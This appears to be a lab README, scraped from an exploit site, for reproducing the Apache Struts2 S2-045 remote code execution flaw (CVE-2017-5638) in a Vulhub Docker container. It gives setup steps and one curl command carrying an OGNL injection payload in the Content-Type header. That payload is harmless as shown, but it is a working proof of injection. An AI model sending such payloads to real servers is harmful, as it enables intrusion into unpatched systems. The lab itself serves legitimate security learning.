Share
## https://sploitus.com/exploit?id=BC00A5DC-9267-5659-AB5C-4EDCB79C1B48
# Apache Struts2 S2-045 RCE (CVE-2017-5638)

## ๐Ÿ“Œ Overview

This project demonstrates the **Remote Code Execution (RCE) vulnerability** in Apache Struts2 (CVE-2017-5638).

Attackers can exploit a crafted HTTP `Content-Type` header to execute arbitrary system commands on vulnerable servers.

This repo uses **Vulhub Docker labs** to provide a safe environment to test and understand the vulnerability.

---

## ๐Ÿ›  Environment Setup

* **Host:** Ubuntu 24.04 (VirtualBox or Native)
* **Docker & Docker Compose**
* **Vulhub Lab**
* **Apache Struts2 version:** 2.3.30

---

## ๐Ÿš€ Getting Started

1๏ธโƒฃ **Clone this repo**

```bash
git clone https://github.com/soufiane-benchahyd/vulhub-struts2.git
cd vulhub-struts2/struts2/s2-045
```

2๏ธโƒฃ **Start the vulnerable container**

```bash
docker compose up -d
```

3๏ธโƒฃ **Verify container is running**

```bash
docker ps
```

You should see something like:

```
CONTAINER ID   IMAGE                   COMMAND                  STATUS      PORTS
xxxxxxx        vulhub/struts2:2.3.30   "/usr/local/bin/mvn-โ€ฆ"   Up          0.0.0.0:8080->8080/tcp
```

4๏ธโƒฃ **Test the web interface**

Open your browser โ†’ `http://:8080`
You should see the Struts2 application homepage.

> VM IP example: `192.168.56.101`

---

## ๐Ÿ’ป Exploitation

> โš ๏ธ Only perform exploitation in a **controlled lab environment**. Never attack public servers.

You can now test the RCE using scripts or tools like `curl` or Metasploit against the vulnerable container.

Example (replace `` with your test command):

```bash
curl -v -H "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','test')}" http://:8080/
```

---

## ๐Ÿ“ Notes

* This lab is **safe**: all actions occur inside Docker.
* Screenshots of your test can be added later to GitHub.
* You can extend this repo with **other Struts2 vulnerabilities** for a full learning portfolio.

---

## โšก References

* [Apache Struts2 S2-045 CVE](https://vulners.com/cve/CVE-2017-5638)
* [Vulhub GitHub](https://github.com/vulhub/vulhub)